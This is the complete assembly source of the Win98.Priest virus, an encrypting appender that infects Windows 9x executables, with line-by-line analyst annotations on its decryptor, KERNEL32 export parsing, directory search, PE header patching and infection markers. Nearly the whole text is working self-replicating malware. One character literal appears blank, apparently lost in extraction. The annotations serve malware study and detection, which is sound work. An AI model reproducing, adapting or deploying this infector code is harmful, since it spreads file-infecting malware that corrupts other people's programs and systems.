
Virus.Win98.Priest - Source Code

  1. ; Win98.Priest
      ; Analyst annotation: appending *.EXE infector for Win9x.  The syntax is
      ; MASM/TASM (.386 / .model flat / offset / end), not NASM as the paste
      ; is tagged.  It depends on a fixed KERNEL32 load address, on ring-3
      ; port I/O (W_ENC) and on hosts mapped at image base 400000h, so it is
      ; tied to the Win9x loader; none of that holds on a current OS.
  2. .386
  3. .model flat
  4. extrn      ExitProcess:PROC          ; only import of the first-generation carrier stub (F_END)
      ; KER32 is treated as the base of a loaded PE image whose export table
      ; is walked below (the strings looked up from it are all KERNEL32
      ; exports); 0bff70000h is the fixed KERNEL32 base of Win9x.
  5. KER32 equ 0bff70000h
      ; Everything that follows up to exew is a byte offset into a scratch
      ; workspace that ebp points at from OK_SE onwards.  0000h..000ch hold
      ; export-table pointers, 0010h..003ch resolved API addresses in the
      ; order the name strings appear after W_ENC_END (FIND_FUN fills them).
  6. Limit equ 0000h                     ; NumberOfNames + KER32; only the low word is compared (FIND_SRC_2)
  7. addname equ 0004h                   ; AddressOfNames (VA); advanced in place by FIND_SRC
  8. addfun  equ 0008h                   ; AddressOfFunctions (VA)
  9. addord  equ 000Ch                   ; AddressOfNameOrdinals (VA)
  10. create  equ 0010h                  ; CreateFileA
  11. close   equ 0014h                  ; _lclose
  12. rfile   equ 0018h                  ; ReadFile
  13. ffind   equ 001ch                  ; FindFirstFileA
  14. nfind   equ 0020h                  ; FindNextFileA
  15. white   equ 0024h                  ; WriteFile
  16. fpoin   equ 0028h                  ; SetFilePointer
  17. getw    equ 002ch                  ; GetWindowsDirectoryA
  18. gets    equ 0030h                  ; GetSystemDirectoryA
  19. getc    equ 0034h                  ; GetCurrentDirectoryA
  20. srchc   equ 0038h                  ; FindClose
  21. getp    equ 003ch                  ; GetProcAddress, resolved by hand (FIND_SRC); end marker of the FIND_FUN loop
  22. shand   equ 0040h                  ; FindFirstFileA search handle
  23. fhand   equ 0044h                  ; handle of the file currently open
  24. reads   equ 0048h                  ; lpNumberOfBytesRead / lpNumberOfBytesWritten scratch dword
  25. OLDEDI  equ 004ch                  ; not referenced anywhere in this listing
  26. chkif   equ 0050h                  ; files infected this run; the run stops at 6
  27. chkdi   equ 0054h                  ; directory phase: 0 = current dir, 2 = Windows dir, 3 = System dir
  28. WICHI   equ 0058h                  ; pointer to the spot in exew where the file name is spliced in
  29. exew    equ 005ch                  ; path buffer, 100h-58h bytes, handed to the Get*DirectoryA calls
  30. DATAA   equ 0200h                  ; WIN32_FIND_DATA (nFileSizeLow at +20h, cFileName at +2ch)
  31. heads   equ 0300h                  ; first 400h bytes of the victim; the W_ENC copy is placed at +400h
  32. .code
  33. Start_Virus:
      ; Entry point that infected hosts are repointed to.  Flow: compute the
      ; load delta, decrypt the body in place, pick a read+write section of
      ; the host with enough unbacked tail to serve as workspace, parse the
      ; KERNEL32 export table, infect up to six *.EXE files in the current,
      ; Windows and System directories, then jump to the host's original
      ; entry point through R_IP.
      ; On-disk / in-memory indicators visible in this listing: word 5E5Eh
      ; ('^^') at MZ offset 12h; the last section grown and re-flagged
      ; 0c0000040h with AddressOfEntryPoint inside it; the strings
      ; 'Win98.Priest' / 'SVS/COREA/MOV' (encrypted on disk, clear in
      ; memory); the host's original entry RVA (OLDIP) in the last dword of
      ; the appended body, outside the encrypted range.
  34. Call Delta_Offset
  35. Delta_Offset:
  36. Pop Ebp
  37. Sub Ebp,Offset Delta_Offset        ; ebp = load delta (run-time VA minus assembled VA)
  38. pushad
      ; Decryptor.  The immediate of "mov EAX,00h" is overwritten per copy by
      ; W_ENC (KEY_CODE+1), so the stub itself is constant and the key is the
      ; only variable part.  VIRUS_BODY..End_Virus-4 is XORed a dword at a
      ; time, stepping one byte, with the key byte-swapped and rotated after
      ; each step; ENCRY_E applies the identical transform.
  39. KEY_CODE:
  40. mov EAX,00h
  41. LEA eSI,[VIRUS_BODY+EBP]
  42. mov ecx,End_Virus - VIRUS_BODY -4
  43. KEYCODE:
  44. XOR DWORD ptr [esi],eax
  45. add esi,1
  46. xchg al,ah
  47. ror eax,1
  48. loop KEYCODE
  49. VIRUS_BODY:
  50. popad
      ; Stack from here on: [host entry VA][eax as it was at entry].  The
      ; second value is later used as the virus's own base (lines 115/136),
      ; which only works if the loader enters the program with eax = entry
      ; point — assumption, verify against the Win9x loader.
  51. push eax
  52. mov eax,[OLDIP+ebp]
  53. add eax,400000h                     ; original entry RVA + fixed image base
  54. push eax
  55. call Scan_DATA                      ; esi -> 'PE\0\0' of the host image, or bail out
      ; Section hunt: find a section whose Characteristics have both
      ; 0c0000000h bits (read+write) and whose VirtualSize, rounded up to
      ; 512, exceeds SizeOfRawData by at least 700h + sizeof(W_ENC..W_ENC_END).
      ; That unbacked tail becomes the workspace.  edi = section header,
      ; esi = its Characteristics field.
  56. mov EDI,ESI
  57. add ESI,6                           ; &NumberOfSections
  58. cmp word ptr [esi],0
  59. je  R_IP
  60. xor ecx,ecx
  61. mov cx,[esi]                        ; ecx = section count (loop counter)
  62. add ESI,0f2h
  63. add ESI,24h                         ; PE+11ch = Characteristics of section 0
  64. add edi,0f8h                        ; PE+0f8h = first section header
  65. CHk_se:
  66. mov eax,[esi]
  67. and eax,0c0000000h
  68. cmp eax,0c0000000h
  69. jne Next_Se
  70. mov eax,[edi+8h]                    ; VirtualSize
  71. mov ebx,511
  72. add eax,ebx
  73. xor edx,edx
  74. inc ebx
  75. div ebx
  76. mul ebx                             ; rounded up to a multiple of 512
  77. sub eax,[edi+10h]                   ; minus SizeOfRawData = bytes with no file backing
  78. cmp eax,700h+(W_ENC_END - W_ENC)
  79. jge  OK_SE                          ; signed compare
  80. Next_Se:
  81. add esi,28h
  82. add edi,28h
  83. loop CHk_se
  84. JMP R_IP                            ; no usable section: run the host untouched
  85. OK_SE:
  86. mov esi,[edi+0ch]                   ; VirtualAddress
  87. add esi,[edi+10h]                   ; + SizeOfRawData
  88. add esi,400000h
  89. mov ebp,ESI                         ; ebp = workspace; the equates index it from now on (delta is no longer needed)
      ; Export-table parse at the fixed KERNEL32 base.
  90. xor eax,eax
  91. mov esi,KER32+3ch
  92. lodsw                               ; e_lfanew, low word only
  93. add eax,KER32
  94. cmp dword ptr [eax],00004550h
  95. jne R_IP
  96. mov esi,[eax+78h]                   ; DataDirectory[0].VirtualAddress = export directory RVA
  97. add esi,24                          ; +18h = NumberOfNames
  98. add esi,KER32
  99. lodsd
  100. add eax,KER32                      ; KER32 is added to a count here; harmless only because its low word is 0
  101. mov [ebp+Limit],eax
  102. lodsd
  103. add eax,KER32
  104. mov [ebp+addfun],eax
  105. lodsd
  106. add eax,KER32
  107. mov [ebp+addname],eax
  108. lodsd
  109. add eax,KER32
  110. mov [ebp+addord],eax
      ; Locate GetProcAddress by name: linear search of AddressOfNames for
      ; the string at gp, then name index -> ordinal -> AddressOfFunctions.
  111. pop eax
  112. pop ebx
  113. push ebx
  114. push eax
  115. mov esi,ebx                        ; ebx = virus base (see note at VIRUS_BODY)
  116. add esi,offset gp - Start_Virus
  117. mov ebx,esi
  118. mov edi,[ebp+addname]
  119. mov edi,[edi]
  120. add edi,KER32                      ; edi -> first exported name
  121. xor ecx,ecx                        ; ecx = name index
  122. call FIND_SRC                      ; returns with ecx = index of the match, or aborts to the host
  123. shl ecx,1
  124. mov esi,[ebp+addord]
  125. add esi,ecx
  126. xor eax,eax
  127. mov ax,word ptr [esi]              ; ordinal
  128. shl eax,2
  129. mov esi,[ebp+addfun]
  130. add esi,eax
  131. mov edi,[esi]
  132. add edi,KER32
  133. mov [getp+ebp],edi
      ; Resolve the other eleven APIs with GetProcAddress(KER32, name),
      ; walking the NUL-terminated strings from cf and storing each result
      ; at ebp+create, ebp+close, ... until ebx reaches getp.
  134. mov ebx,create
  135. pop eax
  136. pop edi
  137. push edi
  138. push eax
  139. add edi,offset cf - Start_Virus
  140. FIND_FUN:
  141. push edi
  142. push KER32
  143. call [getp+ebp]
  144. mov [ebx+ebp],eax
  145. add ebx,4
  146. cmp ebx,getp
  147. je  OK_FIND_FILE
  148. mov al,0
  149. repne scasb                        ; advance past the NUL; ecx is whatever FIND_SRC left
  150. jmp FIND_FUN
      ; Directory phase 1: GetCurrentDirectoryA(100h-58h, exew).
  151. OK_FIND_FILE:
  152. lea eax,[ebp+exew]
  153. push eax
  154. push 100h - 58h
  155. call [getc+ebp]
  156. or eax,eax
  157. je CHG_DIR
      ; Build "<dir><sep>*.EXE" in exew and remember in WICHI where the file
      ; name goes.  The pushes of esi/edi here are repeated on every
      ; re-entry from CHG_DIR / CHG_DIR_2.
  158. OK_EXE:
  159. lea esi,[ebp+DATAA]
  160. push esi
  161. lea edi,[ebp+exew]
  162. push edi
  163. scan_dir:
  164. cmp byte ptr [edi],00h
  165. je ok_make_exe
  166. add edi,1
  167. jmp scan_dir
  168. ok_make_exe:
  169. mov al,''                          ; empty literal in this paste — presumably a path separator lost in extraction
  170. stosb
  171. mov dword ptr [ebp+WICHI],edi
  172. mov ax,'.*'                        ; little-endian: stores "*."
  173. stosw
  174. mov eax,'EXE'                      ; stores "EXE",0
  175. stosd
  176. call [ebp+ffind]                   ; FindFirstFileA(exew, &DATAA)
  177. mov [ebp+shand],eax
  178. cmp eax,-1
  179. je R_IP
  180. mov eax,0
      ; Name filter: any file whose name contains v, V, n or N is skipped
      ; (NEXT_FILE re-enters here without resetting eax).  This filter is a
      ; usable behavioural fingerprint of the family.
  181. open_file:
  182. cmp byte ptr [ebp+DATAA+2ch+eax],'v'
  183. je NEXT_FILE
  184. cmp byte ptr [ebp+DATAA+2ch+eax],'n'
  185. je NEXT_FILE
  186. cmp byte ptr [ebp+DATAA+2ch+eax],'V'
  187. je NEXT_FILE
  188. cmp byte ptr [ebp+DATAA+2ch+eax],'N'
  189. je NEXT_FILE
  190. cmp byte ptr [ebp+DATAA+2ch+eax],0
  191. je open_file_start
  192. add eax,1
  193. jmp open_file
  194. open_file_start:
  195. mov edi,dword ptr [ebp+WICHI]
  196. mov ecx,20
  197. lea esi,[ebp+DATAA+2ch]
  198. repz movsb                         ; copies 20 bytes of cFileName regardless of its real length
      ; CreateFileA(exew, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL)
  199. push 0
  200. push 0
  201. push 3
  202. push 0
  203. push 0
  204. push 0c0000000h
  205. lea eax,[ebp+exew]
  206. push eax
  207. call [ebp+create]
  208. mov [ebp+fhand],eax
  209. cmp eax,-1
  210. je File_Close
      ; ReadFile(fhand, &heads, 400h, &reads, NULL)
  211. mov ecx,400h
  212. lea edx,[ebp+heads]
  213. lea eax,[ebp+reads]
  214. push 0
  215. push eax
  216. push ecx
  217. push edx
  218. push dword ptr [ebp+fhand]
  219. call [ebp+rfile]
  220. cmp eax,0
  221. je File_Close
      ; Victim checks: 'MZ'; e_lfanew inside the 400h bytes read; 'PE';
      ; ImageBase == 400000h; not already marked ('^^' at MZ+12h, the e_csum
      ; field, set at line 339); at most 6 sections.  esi = PE header copy.
  222. cmp word ptr [ebp+heads],'ZM'
  223. jne File_Close
  224. xor eax,eax
  225. lea esi,[ebp+heads+3ch]
  226. lodsw
  227. add eax,ebp
  228. add eax,heads
  229. mov esi,eax
  230. lea ebx,[ebp+heads+400h]
  231. cmp eax,ebx
  232. jg  File_Close                     ; signed pointer compare
  233. cmp word ptr [eax],'EP'
  234. jne File_Close
  235. cmp dword ptr [eax+34h],400000h    ; ImageBase
  236. jne File_Close
  237. cmp word ptr [ebp+heads+12h],'^^'  ; infection marker
  238. je File_Close
  239. cmp word ptr [esi+6],6
  240. jg File_Close
      ; Require at least one read+write section (the runtime needs one as
      ; workspace, see CHk_se).  Characteristics sits at +24h of each 28h
      ; byte header, hence the 24h/4h stepping.
  241. xor ecx,ecx
  242. mov edi,esi
  243. mov cx,word ptr [esi+6]
  244. add edi,0f8h
  245. CHK_DATA:
  246. add edi,24h
  247. mov eax,dword ptr [edi]
  248. and eax,0c0000000h
  249. cmp eax,0c0000000h
  250. je  OK_INFECT
  251. add edi,4h
  252. loop CHK_DATA
  253. jmp File_Close
      ; Infection.  Seek to EOF (nFileSizeLow), save the host's
      ; AddressOfEntryPoint into OLDIP, round the body size up to
      ; FileAlignment, grow SizeOfImage by it, then hand over to the
      ; workspace copy of W_ENC which writes the re-encrypted body.
  254. OK_INFECT:
  255. mov eax,[ebp+DATAA+20h]            ; nFileSizeLow
  256. call F_SEEK                        ; SetFilePointer(fhand, EOF, NULL, FILE_BEGIN)
  257. mov edi,[esi+28h]                  ; AddressOfEntryPoint of the victim
  258. pop ebx
  259. pop eax
  260. push eax
  261. push ebx
  262. add eax,offset OLDIP - Start_Virus ; eax is meant to be the virus base here; the stack depth is not
  263. mov dword ptr [eax],edi            ;   obviously balanced against the pushes at OK_EXE — verify
  264. mov eax,offset End_Virus - Start_Virus
  265. mov ecx,[esi+3ch]                  ; FileAlignment
  266. add eax,ecx
  267. xor edx,edx
  268. div ecx
  269. mul ecx                            ; body size rounded up to FileAlignment
  270. add dword ptr [esi+50h],eax        ; SizeOfImage
  271. mov ecx,eax
  272. pop eax
  273. pop ebx
  274. mov edx,ebx                        ; edx = virus base for W_ENC
  275. push ebx
  276. push eax
  277. push ecx                           ; rounded size, consumed at r_body
  278. push ecx                           ; rounded size, consumed at line 334
  279. mov ecx,End_Virus - Start_Virus
      ; Copy W_ENC..W_ENC_END to workspace+heads+400h and jump into it, so
      ; the body can be re-encrypted in place by code that lies outside the
      ; encrypted range.  Note this executes out of a read+write data
      ; section of the host.  ebp is restored by the popad at r_body.
  280. pushad
  281. push edx
  282. add edx,offset W_ENC - Start_Virus
  283. mov esi,edx
  284. lea ebp,[ebp+heads]
  285. add ebp,400h
  286. mov edi,ebp
  287. push edi
  288. mov cx,offset W_ENC_END - W_ENC
  289. repz movsb
  290. pop edi
  291. jmp edi
  292. r_body:
  293. popad
  294. pop ecx
  295. sub ecx,offset End_Virus - Start_Virus   ; bytes of padding up to the alignment boundary
  296. mov edx,400000h                    ; padding is copied from the host's own header in memory
  297. call fwrite
      ; Fix up the last section header (edi = PE+0f8h+(n-1)*28h): the gap
      ; between the end of its raw data and old EOF is computed in
      ; FileAlignment units, SizeOfImage grows by that gap, the new entry
      ; point is VirtualAddress+SizeOfRawData+gap (where the body was
      ; written), and VirtualSize/SizeOfRawData grow by gap + rounded body.
  298. mov eax,[ebp+DATAA+20h]
  299. mov ecx,[esi+3ch]
  300. mov edx,0
  301. div ecx                            ; eax = filesize / FileAlignment, edx = remainder
  302. push edx
  303. push eax
  304. mov edi,esi
  305. mov ax,word ptr [esi+6]            ; only ax is loaded; upper bits of eax keep the quotient's high bits
  306. sub eax,1
  307. mov ecx,28h
  308. mul ecx
  309. add eax,0f8h
  310. add edi,eax                        ; edi -> last section header
  311. xor edx,edx
  312. mov eax,[edi+14h]                  ; PointerToRawData
  313. mov ecx,[esi+3ch]
  314. div ecx
  315. pop edx
  316. sub edx,eax
  317. push edx
  318. mov eax,[edi+10h]                  ; SizeOfRawData, rounded up in alignment units
  319. sub eax,1
  320. add eax,ecx
  321. xor edx,edx
  322. div ecx
  323. mov ebx,eax
  324. pop eax
  325. sub eax,ebx
  326. mul ecx
  327. pop edx
  328. add eax,edx                        ; eax = gap in bytes between end of raw data and old EOF
  329. add dword ptr [esi+50h],eax        ; SizeOfImage
  330. mov ebx,[edi+0ch]
  331. add ebx,[edi+10h]
  332. add ebx,eax
  333. mov [esi+28h],ebx                  ; AddressOfEntryPoint -> appended body
  334. pop ebx
  335. add ebx,eax
  336. add [edi+8h],ebx                   ; VirtualSize
  337. add [edi+10h],ebx                  ; SizeOfRawData
  338. mov [edi+24h],0c0000040h           ; Characteristics = INITIALIZED_DATA | MEM_READ | MEM_WRITE
  339. mov word ptr [ebp+heads+12h],'^^'  ; set the infection marker
  340. mov eax,0
  341. call F_SEEK
  342. lea edx,[ebp+heads]
  343. mov ecx,400h
  344. call fwrite                        ; write the patched 400h-byte header back
  345. inc dword ptr chkif[ebp]
  346. File_Close:
  347. push dword ptr [ebp+fhand]
  348. call [ebp+close]                   ; _lclose; also reached with fhand == -1 after a failed CreateFileA
  349. cmp dword ptr chkif[ebp],6
  350. je CHG_DIR                         ; six infections per run, then stop
  351. NEXT_FILE:
  352. lea eax,[ebp+DATAA]
  353. push eax
  354. push dword ptr [ebp+shand]
  355. call [ebp+nfind]                   ; FindNextFileA(shand, &DATAA)
  356. cmp eax,0
  357. je CHG_DIR
  358. jmp open_file
      ; Directory phases 2 and 3: FindClose, then the Windows directory
      ; (chkdi 0 -> 2) and the System directory (chkdi 2 -> 3); any other
      ; state returns to the host.
  359. CHG_DIR:
  360. push dword ptr [shand+ebp]
  361. call [ebp+srchc]
  362. cmp dword ptr chkif[ebp],6
  363. je R_IP
  364. cmp dword ptr chkdi[ebp],1
  365. jg CHG_DIR_2
  366. add dword ptr chkdi[ebp],2
  367. push 100h-58h
  368. lea eax,[ebp+exew]
  369. push eax
  370. call [ebp+getw]                    ; GetWindowsDirectoryA(exew, 100h-58h)
  371. or eax,eax
  372. je CHG_DIR_2
  373. jmp OK_EXE
  374. CHG_DIR_2:
  375. cmp dword ptr chkdi[ebp],2
  376. jg R_IP
  377. add dword ptr chkdi[ebp],1
  378. push 100h-58h
  379. lea eax,[ebp+exew]
  380. push eax
  381. call [ebp+gets]                    ; GetSystemDirectoryA(exew, 100h-58h)
  382. or eax,eax
  383. je R_IP
  384. jmp OK_EXE
  385. Scan_DATA:
      ; Scan 600h bytes from the fixed image base for the host's own 'PE\0\0'
      ; signature; returns (R_CO) with esi -> signature.  If nothing is found
      ; the loop falls through into R_IP instead of returning.
  386. mov esi,400000h
  387. mov cx,600h                        ; only cx is set; the upper half of ecx is whatever the caller had
  388. Scan_PE:
  389. cmp dword ptr [esi],00004550h
  390. je R_CO
  391. inc esi
  392. loop Scan_PE
  393. R_IP:
      ; Return-to-host, and the shared abort target of every failed check:
      ; pops the saved host entry VA and the saved entry-time eax, then
      ; transfers control to the host.
  394. pop eax
  395. pop ebx
  396. jmp eax
  397. R_CO:
  398. ret
  399. FIND_SRC:
      ; Linear search of the export name table for the string at ebx.
      ; In:  ebx -> pattern, edi -> current exported name, ecx = name index,
      ;      [ebp+addname] -> current AddressOfNames slot (advanced in place).
      ; Out: ecx = index of the matching name (returns through R_CO);
      ;      on exhaustion drops its return address and aborts to the host.
  400. mov esi,ebx
  401. X_M:
  402. cmpsb
  403. jne FIND_SRC_2
  404. cmp byte ptr [edi],0               ; exported name ended right after a matching byte
  405. je R_CO
  406. jmp X_M
  407. FIND_SRC_2:
  408. inc cx
  409. cmp cx,[ebp+Limit]                 ; low word of Limit = NumberOfNames
  410. jge NOT_SRC
  411. add dword ptr [ebp+addname],4
  412. mov edi,[ebp+addname]
  413. mov edi,[edi]
  414. add edi,KER32
  415. jmp FIND_SRC
  416. NOT_SRC:
  417. pop esi                            ; discard the return address pushed by call FIND_SRC
  418. jmp R_IP
  419. F_SEEK:
      ; SetFilePointer(fhand, eax, NULL, FILE_BEGIN).  In: eax = absolute offset.
  420. push 0
  421. push 0
  422. push eax
  423. push dword ptr [ebp+fhand]
  424. call [ebp+fpoin]
  425. ret
  426. W_ENC:
      ; Runs from its copy in the workspace (reached by "jmp edi" at line
      ; 291), not from the virus body, because it XORs the body that
      ; contains it.  The stack top is the edx pushed at line 281 (virus
      ; base); the registers from the pushad at line 280 are reloaded via
      ; popad/pushad before each step.
      ; Key: two reads of I/O port 40h (the PIT counter on PC hardware —
      ; ring-3 port I/O is permitted on Win9x only) plus edi (copy address)
      ; plus whatever eax held on entry.
  427. in al,40h
  428. xchg al,ah
  429. in al,40h
  430. add eax,edi
  431. add edi,offset ENCRY_E - W_ENC +1  ; +1 = the imm32 of "mov eax,00h" in the copied ENCRY_E
  432. mov dword ptr [edi],eax
  433. pop edx                            ; virus base
  434. add edx,offset KEY_CODE - Start_Virus +1   ; imm32 of the decryptor's "mov EAX,00h" in the in-memory body
  435. mov dword ptr [edx],eax
  436. popad
  437. pushad
  438. mov esi,edx
  439. add esi,offset VIRUS_BODY - Start_Virus
  440. mov ecx,offset End_Virus - VIRUS_BODY -4
  441. call ENCRY_E                       ; encrypt the body in place (near call -> the copy's ENCRY_E)
  442. popad
  443. pushad
  444. call fwrite                        ; WriteFile(fhand, virus base, End_Virus-Start_Virus)
  445. popad
  446. pushad
  447. mov esi,edx
  448. add esi,offset VIRUS_BODY - Start_Virus
  449. mov ecx,offset End_Virus - VIRUS_BODY -4
  450. call ENCRY_E                       ; same XOR again: decrypt the body back in place
  451. popad
  452. pushad
  453. add edx,offset r_body - Start_Virus
  454. jmp edx                            ; back into the body
  455. ENCRY_E:
      ; Rolling XOR over ecx bytes at esi, identical to the decryptor at
      ; KEY_CODE; the key immediate below is filled in by W_ENC at run time.
  456. mov eax,00h
  457. ENCRY:
  458. xor dword ptr [esi],eax
  459. xchg al,ah
  460. ror eax,1
  461. inc esi                            ; one-byte step, so successive dwords overlap
  462. loop ENCRY
  463. ret
  464. fwrite:
      ; WriteFile(fhand, edx, ecx, &reads, NULL).  In: edx = buffer, ecx = length.
      ; Lies before W_ENC_END, so it is part of the block copied to the workspace.
  465. push 0
  466. lea eax,[ebp+reads]
  467. push eax
  468. push ecx
  469. push edx
  470. push dword ptr [ebp+fhand]
  471. call [ebp+white]
  472. ret
  473. W_ENC_END:
      ; API name strings, in the order FIND_FUN stores them at
      ; ebp+create .. ebp+srchc; gp is looked up separately through the
      ; export table.  All of this is inside the encrypted range on disk.
  474. cf db 'CreateFileA',0
  475. cl db '_lclose',0
  476. rf db 'ReadFile',0
  477. ff db 'FindFirstFileA',0
  478. fn db 'FindNextFileA',0
  479. wf db 'WriteFile',0
  480. sf db 'SetFilePointer',0
  481. gw db 'GetWindowsDirectoryA',0
  482. gs db 'GetSystemDirectoryA',0
  483. gc db 'GetCurrentDirectoryA',0
  484. fc db 'FindClose',0
  485. gp db 'GetProcAddress',0
      ; Name / group tag; a memory-only string indicator (encrypted on disk).
  486. vn db 'Win98.Priest'
  487.    db 'SVS/COREA/MOV'
      ; Host's original entry RVA, patched per infection (line 263).  These
      ; last 4 bytes are excluded from the XOR loop (End_Virus-4), so they
      ; are stored in clear at the end of the appended body — usable for
      ; recovering the original entry point of an infected file.  In the
      ; first-generation carrier it points at the F_END stub below.
  488. OLDIP  dd F_END - 400000h
  489. End_Virus:
      ; Carrier stub: the host for generation zero simply exits.
  490. F_END:
  491. push 0
  492. call ExitProcess
  493.  
  494. end Start_Virus
  495.  
Tags: virus Win98